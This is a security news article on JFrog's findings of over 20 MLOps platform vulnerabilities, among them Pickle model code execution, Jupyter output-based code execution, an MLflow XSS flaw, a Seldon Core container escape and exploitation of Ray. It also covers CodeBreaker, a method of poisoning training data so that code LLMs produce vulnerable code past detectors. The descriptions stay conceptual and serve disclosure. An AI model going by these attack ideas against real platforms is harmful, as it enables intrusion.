Scientists Uncover More Than 20 Weaknesses in Supply Chain of MLOps Platforms

Researchers Identify Over 20 Supply Chain Vulnerabilities in MLOps Platforms

A team of experts in cybersecurity have cautioned about the security threats in the machine learning (ML) software supply chain after uncovering more than 20 vulnerabilities that could be exploited to target MLOps platforms.

These vulnerabilities, described as intrinsic and implementation-based weaknesses, have the potential for severe outcomes, varying from arbitrary code execution to introducing malicious datasets.

MLOps platforms provide the capability to design and execute a ML model pipeline, with a model registry functioning as a storage to store and version-trained ML models. These models can then be integrated into an application or allow other users to access them using an API (also known as model-as-a-service).

“Intrinsic vulnerabilities are vulnerabilities that arise from the fundamental formats and processes utilized in the target technology,” stated researchers at JFrog in an extensive report.

Some illustrations of intrinsic vulnerabilities include exploiting ML models to execute code chosen by the attacker by leveraging the fact that models support automatic code execution upon loading (for example, Pickle model files).

This behavior also extends to specific dataset formats and libraries that allow automatic code execution, potentially leading to malware attacks when merely loading a dataset that is publicly available.

Another case of intrinsic vulnerability concerns JupyterLab (previously Jupyter Notebook), a web-based interactive computational environment that permits users to run blocks (or cells) of code and view the corresponding results.

“An intrinsic matter that many are unaware of relates to the handling of HTML output when executing code blocks in Jupyter,” noted the researchers. “The output of your Python code could emit HTML and [JavaScript], which will be rendered by your browser.”

The issue here is that when the JavaScript result runs, it is not isolated from the main web application, allowing the main application to execute arbitrary Python code automatically.

Essentially, an attacker could generate malicious JavaScript code to insert a new cell in the current JupyterLab notebook, inject Python code into it, and then execute it. This is particularly applicable in scenarios where exploiting a cross-site scripting (XSS) vulnerability.

In this context, JFrog mentioned it discovered an XSS flaw in MLFlow (CVE-2024-27132, CVSS score: 7.5) resulting from inadequate sanitization during the execution of an untrusted recipe, leading to client-side code execution in JupyterLab.

“A key lesson we’ve learned from this research is that all XSS vulnerabilities in ML libraries should be treated as potential arbitrary code execution, given that data scientists may utilize these ML libraries with Jupyter Notebook,” the researchers emphasized.

The second category of flaws pertains to weaknesses in implementation, such as lack of authentication in MLOps platforms, potentially allowing a malicious actor with network access to achieve code execution capabilities by exploiting the ML Pipeline feature.

These risks are not theoretical, as attackers driven by financial motives exploit such vulnerabilities, as evidenced by the case of unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), to deploy cryptocurrency mining activities.

Another form of implementation vulnerability is a container breakout aimed at Seldon Core, granting attackers the ability to move beyond code execution to navigate horizontally across the cloud environment and reach other users’ models and datasets by uploading a malicious model to the inference server.

By chaining these vulnerabilities, it is possible for threat actors to not only infiltrate and propagate within an organization but also compromise servers.

“If you are deploying a platform that allows for model serving, it is important to realize that anyone who can serve a new model can also execute arbitrary code on that server,” highlighted the researchers. “Ensure that the environment running the model is completely isolated and secure against a container escape.”

This disclosure coincides with Unit 42 from Palo Alto Networks detailing two now-resolved vulnerabilities in the LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467) that had the potential to allow attackers to execute arbitrary code and access sensitive data, respectively.

Recently, issues in Ask Astro, an open-source chatbot application utilizing retrieval augmented generation (RAG), were uncovered by Trail of Bits, posing risks like chatbot output manipulation, inaccurate document processing, and potential denial-of-service (DoS).

Just as vulnerabilities are being exposed in AI-powered applications, methods are also being developed to contaminate training datasets with the aim of deceiving large language models (LLMs) into generating vulnerable code.

“In contrast to recent attacks that include malicious payloads in detectable or irrelevant sections of the code (e.g., comments), CodeBreaker utilizes LLMs (for instance, GPT-4) for advanced payload transformation (without affecting functionalities), ensuring that both the poisoned data for fine-tuning and generated code can bypass strong vulnerability detection mechanisms,” noted a group of researchers from the University of Connecticut stated.

Found this article appealing? Follow us on Twitter and LinkedIn for more exclusive content we publish.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts